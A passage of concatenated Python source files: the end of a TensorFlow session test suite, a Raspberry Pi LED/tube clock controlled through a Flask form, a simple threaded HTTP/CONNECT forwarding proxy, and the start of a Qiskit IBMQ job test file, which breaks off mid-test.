sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(
capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
@test_util.disable_c_api # set_device does not work with C API
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor,
fetch_fn, feed_fn1, feed_fn2)
with self.test_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(squared_tensor, feed_dict={
squared_tensor : np1 * np1})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
# Passing the config to the server, but not the session should still result
# in logging device placement.
config = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
sess.run(c)
# Ensure that we did log device placement.
self.assertTrue('/job:local/replica:0/task:0/cpu:0' in str(log), str(log))
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
enter_1 = control_flow_ops.enter(data, 'foo_1', False)
enter_2 = control_flow_ops.enter(data, 'foo_2', False)
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testGraphOptimizer(self):
rewrite_options = rewriter_config_pb2.RewriterConfig(
disable_model_pruning=False, constant_folding=True)
graph_options = config_pb2.GraphOptions(
rewrite_options=rewrite_options, build_cost_model=1)
config = config_pb2.ConfigProto(graph_options=graph_options)
with ops.Graph().as_default() as g:
r1 = random_ops.random_normal(shape=[2, 3], name='R1')
r2 = random_ops.random_normal(shape=[2, 3], name='R2')
copy1 = array_ops.stop_gradient(r1)
copy2 = array_ops.identity(r2)
result = copy1 + copy2
with session.Session(graph=g, config=config) as sess:
metadata = config_pb2.RunMetadata()
sess.run(result, run_metadata=metadata)
# Check that we optimized the graph by looking at the cost model: the add
# node should have been reconnected directly to the R1 and R2 nodes.
found_valid_nodes = 0
for node in metadata.cost_graph.node:
if node.name == 'R1':
r1_cost_id = node.id
found_valid_nodes += 1
if node.name == 'R2':
r2_cost_id = node.id
found_valid_nodes += 1
if node.name == 'add':
if node.input_info[0].preceding_node == r1_cost_id:
self.assertEqual(node.input_info[1].preceding_node, r2_cost_id)
found_valid_nodes += 1
elif node.input_info[0].preceding_node == r2_cost_id:
self.assertEqual(node.input_info[1].preceding_node, r1_cost_id)
found_valid_nodes += 1
self.assertEqual(3, found_valid_nodes)
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
@test_util.disable_c_api # functions don't work with C API
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
@test_util.disable_c_api # functions don't work with C API
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
if __name__ == '__main__':
googletest.main()
|
rpi_led_clock.py
|
#!/usr/bin/env python3
import argparse
import datetime
import time
import threading
import sys
try:
import RPi.GPIO as GPIO
gpio_present = True
except ModuleNotFoundError:
print("RPi.GPIO module not present, forcing a dry run")
gpio_present = False
from flask import Flask, request, render_template
global time_input
global update_needed
global blank_requested
app = Flask(__name__)
# Channels in use that need to be set as output.
channels = list(range(0, 28))
# Pins corresponding to each segment per digit TODO: Actually map the pins
pins_per_segment = {
0: (0, 1, 2, 3, 4, 5, 6),
1: (7, 8, 9, 10, 11, 12, 13),
2: (14, 15, 16, 17, 18, 19, 20),
3: (21, 22, 23, 24, 25, 26, 27),
}
# Pin controlling the colon between hour and minute digits - not used at the moment
# colon = 29
# Segments:
# 0 - top, 1 - upper right, 2 - upper left, 3 - bottom right, 4 - bottom left, 5 - bottom, 6 - crossbar
# Segments used for each digit; 0, 1 = off, on.
digits = {
"0": (1, 1, 1, 1, 1, 1, 0), # 0
"1": (0, 1, 1, 0, 0, 0, 0), # 1
"2": (1, 1, 0, 1, 1, 0, 1), # 2
"3": (1, 1, 1, 1, 0, 0, 1), # 3
"4": (0, 1, 1, 0, 0, 1, 1), # 4
"5": (1, 0, 1, 1, 0, 1, 1), # 5
"6": (1, 0, 1, 1, 1, 1, 1), # 6
"7": (1, 1, 1, 0, 0, 0, 0), # 7
"8": (1, 1, 1, 1, 1, 1, 1), # 8
"9": (1, 1, 1, 1, 0, 1, 1), # 9
" ": (0, 0, 0, 0, 0, 0, 0), # blank display
}
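# Editor's illustrative sketch (not part of the original script): shows how the
# two lookup tables above combine. For a given digit at a display position,
# these are the GPIO pins that LedClock.set_segment would drive LOW (segment
# lit). The concrete pin numbers are placeholders until the TODO mapping above
# is filled in.
def _pins_lit_for(digit, digit_position):
    """Return the pins that would be lit for `digit` at `digit_position`."""
    return [pins_per_segment[digit_position][segment]
            for segment, state in enumerate(digits[digit]) if state == 1]
# Example: _pins_lit_for("7", 2) -> [14, 15, 16] (top, upper right, upper left).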
class LedClock:
def __init__(self, dry_run=0):
self.display = ""
self.dry_run = dry_run
def set_segment(self, segment, digit_position, state):
if self.dry_run:
print(f"Setting pin # {pins_per_segment[digit_position][segment]} to {state == 0}")
print(f"Segment {segment} is now {'down' if (state == 0) else 'up'}")
else:
# We disable a segment by setting a GPIO pin to HIGH state
GPIO.output(pins_per_segment[digit_position][segment], state == 0)
def set_digit(self, digit, digit_position):
for segment in range(0, 7):
self.set_segment(segment, digit_position, digits[digit][segment])
def update_display(self):
for i in range(0, 4):
self.set_digit(self.display[i], i)
def blank_display(self):
print("Blanking display and stopping updates until a new time is input")
self.display = " "
self.update_display()
class TubeClock(LedClock):
def __init__(self, dry_run=0):
super().__init__(dry_run)
self.digit_mapping = {
0: (None, 0, 1),
1: (2, 3, 4, 5, 6, 7, 8, 9, 10, 11),
2: (12, 13, 14, 15, 16, 17),
3: (18, 19, 20, 21, 22, 23, 24, 25, 26, 27)
}
def set_digit(self, digit, digit_position):
for i in self.digit_mapping[digit_position]:
if i is None:
if self.dry_run:
print(
f"Digit {self.digit_mapping[digit_position].index(i)} at position {digit_position} not "
f"enabled, skipping")
else:
continue
elif str(self.digit_mapping[digit_position].index(i)) != digit:
if self.dry_run:
print(f"Setting GPIO pin {i} to GPIO.HIGH")
else:
GPIO.output(i, GPIO.HIGH)
elif str(self.digit_mapping[digit_position].index(i)) == digit:
if self.dry_run:
print(f"Setting GPIO pin {i} to GPIO.LOW")
else:
GPIO.output(i, GPIO.LOW)
def gpio_setup(channel_list):
GPIO.setmode(GPIO.BCM)
GPIO.setup(channel_list, GPIO.OUT, initial=GPIO.HIGH)
def parse_arguments():
parser = argparse.ArgumentParser(description="Display time on a 7-segment LED clock")
parser.add_argument("--time", metavar="HHMM", type=str, nargs="?", help="Hour to display on the clock. If not "
"specified, clock will start blanked")
parser.add_argument("--dry_run", action="store_true", help="If set, do a dry run and do not set any GPIO pins")
parser.add_argument("--type", action="store", type=str, nargs="?", default="tube",
help='Type of clock. Allowed values "tube" (default) and "led"')
return parser.parse_args()
def is_time(string):
if not len(string) == 4:
return False
elif int(string[0:2]) in range(24) and int(string[2:4]) in range(60):
return True
else:
return False
@app.route('/', methods=["GET", "POST"])
def index():
if request.method == "POST":
global time_input
global update_needed
global blank_requested
if is_time(request.form["time"]):
time_input = request.form["time"]
update_needed = True
blank_requested = False
elif (request.form["time"]) == "":
blank_requested = True
print("Requesting blank")
else:
print(f"Unrecognised input {request.form['time']}")
return render_template('index.html')
def start_display(new_time):
global time_input
global update_needed
global blank_requested
update_needed = False
display_blanked = False
if new_time is None:
blank_requested = True
new_time = datetime.datetime.now()
else:
blank_requested = False
while True:
if update_needed:
new_time = datetime.datetime(100, 1, 1, int(time_input[0:2]), int(time_input[2:]), 00)
update_needed = False
display_blanked = False
if not blank_requested and new_time.strftime("%H%M") != x.display:
x.display = new_time.strftime("%H%M")
x.update_display()
print(f"setting display to {new_time.strftime('%H%M')}")
if blank_requested and not display_blanked:
x.blank_display()
display_blanked = True
time.sleep(1)
new_time = new_time + datetime.timedelta(seconds=1)
if __name__ == '__main__':
args = parse_arguments()
if args.time is None:
starting_time = None
elif is_time(args.time):
starting_time = datetime.datetime(100, 1, 1, int(args.time[0:2]), int(args.time[2:]), 00)
else:
print(f"Unrecognised --time argument, exiting")
sys.exit(1)
if args.dry_run or gpio_present is False:
force_dry_run = True
else:
force_dry_run = False
try:
if not force_dry_run:
gpio_setup(channels)
if args.type == "tube":
x = TubeClock(dry_run=force_dry_run)
elif args.type == "led":
x = LedClock(dry_run=force_dry_run)
else:
print("Unknown clock type, aborting")
sys.exit(1)
display_thread = threading.Thread(target=start_display, args=(starting_time,), daemon=True)
display_thread.start()
app.run(host="0.0.0.0", port=1080)
except KeyboardInterrupt:
print("Received a keyboard interrupt, cleaning up GPIO")
finally:
if not force_dry_run:
GPIO.cleanup()
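# Editor's usage sketch (illustrative, not part of the original):
#
#   python3 rpi_led_clock.py --time 1234 --dry_run --type led
#
# starts the Flask server on port 1080 with the display showing 12:34 in
# dry-run mode (GPIO pins are only printed, never driven).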
|
server.py
|
__author__ = 'ziyan.yin'
import logging
import socket
import threading
TIMEOUT = 1000
BUF_SIZE = 4096
HOST = '0.0.0.0'
PORT = 11212
_logger = logging.getLogger('proxy')
def get_addr(package):
data = package.split(b'\r\n')
method = data[0]
is_ssl = False
if method.startswith(b'CONNECT'):
addr = method.split(b' ')[1].decode()
if ':' in addr:
host = addr[:addr.find(':')]
port = int(addr[addr.find(':') + 1:])
else:
host = addr
port = 443
is_ssl = True
else:
for header in data:
if header.startswith(b'Host'):
addr = header.split(b' ')[1].decode()
break
else:
addr = method.split(b'/')[2].decode()
if ':' in addr:
host = addr[:addr.find(':')]
port = int(addr[addr.find(':')+1:])
else:
host = addr
port = 80
protocol = method.split(b' ')[2].decode()
return host, port, is_ssl, protocol
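# Editor's illustrative sketch (not part of the original module): a quick check
# of the two request shapes get_addr understands, a CONNECT tunnel request and
# a plain proxied GET.
def _get_addr_examples():
    assert get_addr(b'CONNECT example.com:443 HTTP/1.1\r\n\r\n') == (
        'example.com', 443, True, 'HTTP/1.1')
    assert get_addr(
        b'GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\n\r\n'
    ) == ('example.com', 80, False, 'HTTP/1.1')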
def communicate(client, server):
try:
while data := client.recv(BUF_SIZE):
server.sendall(data)
except Exception as ex:
_logger.error(ex)
finally:
server.close()
def handle(client):
client.settimeout(TIMEOUT)
message = b''
try:
while data := client.recv(BUF_SIZE):
message = b"%s%s" % (message, data)
if data.endswith(b'\r\n\r\n'):
break
except ConnectionError:
return
if not message:
client.close()
return
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host, port, is_ssl, protocol = get_addr(message)
_logger.info((host, port))
try:
server.connect((host, port))
server.settimeout(TIMEOUT)
if is_ssl:
data = f"{protocol} 200 Connection Established\r\n\r\n".encode()
client.sendall(data)
threading.Thread(target=communicate, args=(client, server)).start()
threading.Thread(target=communicate, args=(server, client)).start()
else:
server.sendall(message)
threading.Thread(target=communicate, args=(client, server)).start()
threading.Thread(target=communicate, args=(server, client)).start()
except ConnectionError:
server.close()
client.close()
def main(**kwargs):
global HOST
global PORT
global TIMEOUT
if 'host' in kwargs:
HOST = kwargs['host']
if 'port' in kwargs:
PORT = kwargs['port']
if 'timeout' in kwargs:
TIMEOUT = kwargs['timeout']
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((HOST, PORT))
server.listen(10)
_logger.info(f'proxy start on {PORT}')
while True:
conn, addr = server.accept()
_logger.debug(addr)
threading.Thread(target=handle, args=(conn,)).start()
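# Editor's usage sketch (illustrative, not part of the original): one way to run
# the proxy in the background and route an HTTP request through it. The host,
# port and the use of `requests` here are assumptions, not part of this module.
#
#   import threading, requests
#   threading.Thread(target=main, kwargs={'host': '127.0.0.1', 'port': 11212},
#                    daemon=True).start()
#   resp = requests.get('http://example.com/',
#                       proxies={'http': 'http://127.0.0.1:11212'})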
|
test_ibmq_job.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""IBMQJob Test."""
import time
import copy
from datetime import datetime, timedelta
from unittest import SkipTest, mock
from threading import Thread, Event
from dateutil import tz
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.test import slow_test
from qiskit.test.reference_circuits import ReferenceCircuits
from qiskit.compiler import transpile
from qiskit.result import Result
from qiskit.providers.jobstatus import JobStatus, JOB_FINAL_STATES
from qiskit.providers.ibmq import least_busy
from qiskit.providers.ibmq.apiconstants import ApiJobStatus, API_JOB_FINAL_STATES
from qiskit.providers.ibmq.ibmqbackend import IBMQRetiredBackend
from qiskit.providers.ibmq.exceptions import IBMQBackendError, IBMQBackendApiError
from qiskit.providers.ibmq.utils.utils import api_status_to_job_status
from qiskit.providers.ibmq.job.exceptions import IBMQJobTimeoutError
from qiskit.providers.ibmq.utils.converters import local_to_utc
from qiskit.providers.ibmq.api.rest.job import Job as RestJob
from qiskit.providers.ibmq.api.exceptions import RequestsApiError
from ..ibmqtestcase import IBMQTestCase
from ..decorators import (requires_provider, requires_device)
from ..utils import (most_busy_backend, get_large_circuit, cancel_job,
submit_job_bad_shots, submit_and_cancel, submit_job_one_bad_instr)
class TestIBMQJob(IBMQTestCase):
"""Test ibmqjob module."""
@classmethod
@requires_provider
def setUpClass(cls, provider):
"""Initial class level setup."""
# pylint: disable=arguments-differ
super().setUpClass()
cls.provider = provider
cls.sim_backend = provider.get_backend('ibmq_qasm_simulator')
cls.bell = transpile(ReferenceCircuits.bell(), cls.sim_backend)
cls.sim_job = cls.sim_backend.run(cls.bell, validate_qobj=True)
cls.last_month = datetime.now() - timedelta(days=30)
@slow_test
@requires_device
def test_run_device(self, backend):
"""Test running in a real device."""
shots = 8192
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend),
validate_qobj=True, shots=shots)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result = job.result()
counts_qx = result.get_counts(0)
counts_ex = {'00': shots / 2, '11': shots / 2}
self.assertDictAlmostEqual(counts_qx, counts_ex, shots * 0.2)
# Test fetching the job properties, as this is a real backend and is
# guaranteed to have them.
self.assertIsNotNone(job.properties())
def test_run_multiple_simulator(self):
"""Test running multiple jobs in a simulator."""
num_qubits = 16
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 5
job_array = [self.sim_backend.run(transpile([qc] * 20), validate_qobj=True, shots=2048)
for _ in range(num_jobs)]
timeout = 30
start_time = time.time()
while True:
check = sum(
[job.status() is JobStatus.RUNNING for job in job_array])
if check >= 2:
self.log.info('found %d simultaneous jobs', check)
break
if all([job.status() is JobStatus.DONE for job in job_array]):
# done too soon? don't generate error
self.log.warning('all jobs completed before simultaneous jobs '
'could be detected')
break
for job in job_array:
self.log.info('%s %s %s %s', job.status(), job.status() is JobStatus.RUNNING,
check, job.job_id())
self.log.info('- %s', str(time.time() - start_time))
if time.time() - start_time > timeout:
raise TimeoutError('Failed to see multiple running jobs after '
'{0} seconds.'.format(timeout))
time.sleep(0.2)
result_array = [job.result() for job in job_array]
self.log.info('got back all job results')
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
@slow_test
@requires_device
def test_run_multiple_device(self, backend):
"""Test running multiple jobs in a real device."""
num_qubits = 5
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 3
job_array = [backend.run(transpile(qc, backend=backend), validate_qobj=True)
for _ in range(num_jobs)]
time.sleep(3) # give time for jobs to start (better way?)
job_status = [job.status() for job in job_array]
num_init = sum(
[status is JobStatus.INITIALIZING for status in job_status])
num_queued = sum([status is JobStatus.QUEUED for status in job_status])
num_running = sum(
[status is JobStatus.RUNNING for status in job_status])
num_done = sum([status is JobStatus.DONE for status in job_status])
num_error = sum([status is JobStatus.ERROR for status in job_status])
self.log.info('number of currently initializing jobs: %d/%d',
num_init, num_jobs)
self.log.info('number of currently queued jobs: %d/%d',
num_queued, num_jobs)
self.log.info('number of currently running jobs: %d/%d',
num_running, num_jobs)
self.log.info('number of currently done jobs: %d/%d',
num_done, num_jobs)
self.log.info('number of errored jobs: %d/%d',
num_error, num_jobs)
self.assertTrue(num_jobs - num_error - num_done > 0)
# Wait for all the results.
for job in job_array:
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result_array = [job.result() for job in job_array]
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
def test_cancel(self):
"""Test job cancellation."""
# Find the most busy backend
backend = most_busy_backend(self.provider)
submit_and_cancel(backend)
def test_retrieve_jobs(self):
"""Test retrieving jobs."""
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=5, skip=0, start_datetime=self.last_month)
self.assertLessEqual(len(job_list), 5)
for job in job_list:
self.assertTrue(isinstance(job.job_id(), str))
def test_retrieve_job(self):
"""Test retrieving a single job."""
retrieved_job = self.provider.backend.retrieve_job(self.sim_job.job_id())
self.assertEqual(self.sim_job.job_id(), retrieved_job.job_id())
self.assertEqual(self.sim_job.qobj().to_dict(), retrieved_job.qobj().to_dict())
self.assertEqual(self.sim_job.result().get_counts(), retrieved_job.result().get_counts())
@requires_device
def test_retrieve_job_uses_appropriate_backend(self, backend):
"""Test that retrieved jobs come from their appropriate backend."""
backend_1 = backend
# Get a second backend.
backend_2 = None
provider = backend.provider()
for my_backend in provider.backends():
if my_backend.status().operational and my_backend.name() != backend_1.name():
backend_2 = my_backend
break
if not backend_2:
raise SkipTest('Skipping test that requires multiple backends')
job_1 = backend_1.run(transpile(ReferenceCircuits.bell(), backend_1), validate_qobj=True)
job_2 = backend_2.run(transpile(ReferenceCircuits.bell(), backend_2), validate_qobj=True)
# test a retrieved job's backend is the same as the queried backend
self.assertEqual(backend_1.retrieve_job(job_1.job_id()).backend().name(),
backend_1.name())
self.assertEqual(backend_2.retrieve_job(job_2.job_id()).backend().name(),
backend_2.name())
# test retrieve requests for jobs that exist on other backends throw errors
with self.assertWarns(Warning) as context_manager:
self.assertRaises(IBMQBackendError,
backend_1.retrieve_job, job_2.job_id())
self.assertIn('belongs to', str(context_manager.warning))
with self.assertWarns(Warning) as context_manager:
self.assertRaises(IBMQBackendError,
backend_2.retrieve_job, job_1.job_id())
self.assertIn('belongs to', str(context_manager.warning))
# Cleanup
for job in [job_1, job_2]:
cancel_job(job)
def test_retrieve_job_error(self):
"""Test retrieving an invalid job."""
self.assertRaises(IBMQBackendError,
self.provider.backend.retrieve_job, 'BAD_JOB_ID')
def test_retrieve_jobs_status(self):
"""Test retrieving jobs filtered by status."""
status_args = [JobStatus.DONE, 'DONE', [JobStatus.DONE], ['DONE']]
for arg in status_args:
with self.subTest(arg=arg):
backend_jobs = self.sim_backend.jobs(limit=5, skip=5, status=arg,
start_datetime=self.last_month)
self.assertTrue(backend_jobs)
for job in backend_jobs:
self.assertTrue(job.status() is JobStatus.DONE,
"Job {} has status {} when it should be DONE"
.format(job.job_id(), job.status()))
def test_retrieve_multiple_job_statuses(self):
"""Test retrieving jobs filtered by multiple job statuses."""
statuses_to_filter = [JobStatus.ERROR, JobStatus.CANCELLED]
status_filters = [
{'status': [JobStatus.ERROR, JobStatus.CANCELLED],
'db_filter': None},
{'status': [JobStatus.CANCELLED],
'db_filter': {'or': [{'status': {'regexp': '^ERROR'}}]}},
{'status': [JobStatus.ERROR],
'db_filter': {'or': [{'status': 'CANCELLED'}]}}
]
job_to_cancel = submit_and_cancel(backend=self.sim_backend)
job_to_fail = submit_job_bad_shots(backend=self.sim_backend)
job_to_fail.wait_for_final_state()
for status_filter in status_filters:
with self.subTest(status_filter=status_filter):
job_list = self.sim_backend.jobs(
status=status_filter['status'],
db_filter=status_filter['db_filter'],
start_datetime=self.last_month)
job_list_ids = [_job.job_id() for _job in job_list]
if job_to_cancel.status() is JobStatus.CANCELLED:
self.assertIn(job_to_cancel.job_id(), job_list_ids)
self.assertIn(job_to_fail.job_id(), job_list_ids)
for filtered_job in job_list:
self.assertIn(filtered_job._status, statuses_to_filter,
"job {} has status {} but should be one of {}"
.format(filtered_job.job_id(), filtered_job._status,
statuses_to_filter))
def test_retrieve_active_jobs(self):
"""Test retrieving jobs that are currently unfinished."""
backend = most_busy_backend(self.provider)
active_job_statuses = {api_status_to_job_status(status) for status in ApiJobStatus
if status not in API_JOB_FINAL_STATES}
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
active_jobs = backend.active_jobs()
if not job.in_final_state(): # Job is still active.
self.assertIn(job.job_id(), [active_job.job_id() for active_job in active_jobs])
for active_job in active_jobs:
self.assertTrue(active_job._status in active_job_statuses,
"status for job {} is '{}' but it should be '{}'."
.format(active_job.job_id(), active_job._status, active_job_statuses))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_queued(self):
"""Test retrieving jobs that are queued."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
# Wait for the job to queue, run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.QUEUED, JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_queued = backend.jobs(status=JobStatus.QUEUED, limit=5,
start_datetime=self.last_month)
if before_status is JobStatus.QUEUED and job.status() is JobStatus.QUEUED:
self.assertIn(job.job_id(), [queued_job.job_id() for queued_job in job_list_queued],
"job {} is queued but not retrieved when filtering for queued jobs."
.format(job.job_id()))
for queued_job in job_list_queued:
self.assertTrue(queued_job._status == JobStatus.QUEUED,
"status for job {} is '{}' but it should be {}"
.format(queued_job.job_id(), queued_job._status, JobStatus.QUEUED))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_running(self):
"""Test retrieving jobs that are running."""
job = self.sim_backend.run(self.bell)
# Wait for the job to run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_running = self.sim_backend.jobs(status=JobStatus.RUNNING, limit=5,
start_datetime=self.last_month)
if before_status is JobStatus.RUNNING and job.status() is JobStatus.RUNNING:
self.assertIn(job.job_id(), [rjob.job_id() for rjob in job_list_running])
for rjob in job_list_running:
self.assertTrue(rjob._status == JobStatus.RUNNING,
"Status for job {} is '{}' but should be RUNNING"
.format(rjob.job_id(), rjob._status))
def test_retrieve_jobs_start_datetime(self):
"""Test retrieving jobs created after a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, start_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertGreaterEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_end_datetime(self):
"""Test retrieving jobs created before a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, end_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertLessEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_between_datetimes(self):
"""Test retrieving jobs created between two specified datetimes."""
date_today = datetime.now()
past_month = date_today - timedelta(30)
past_two_month = date_today - timedelta(60)
# Used for `db_filter`, should not override `start_datetime` and `end_datetime` arguments.
past_ten_days = date_today - timedelta(10)
db_filters = [None, {'creationDate': {'gt': past_ten_days}}]
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
past_two_month_tz_aware = past_two_month.replace(tzinfo=tz.tzlocal())
for db_filter in db_filters:
with self.subTest(db_filter=db_filter):
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=2,
start_datetime=past_two_month, end_datetime=past_month, db_filter=db_filter)
self.assertTrue(job_list)
for job in job_list:
self.assertTrue(
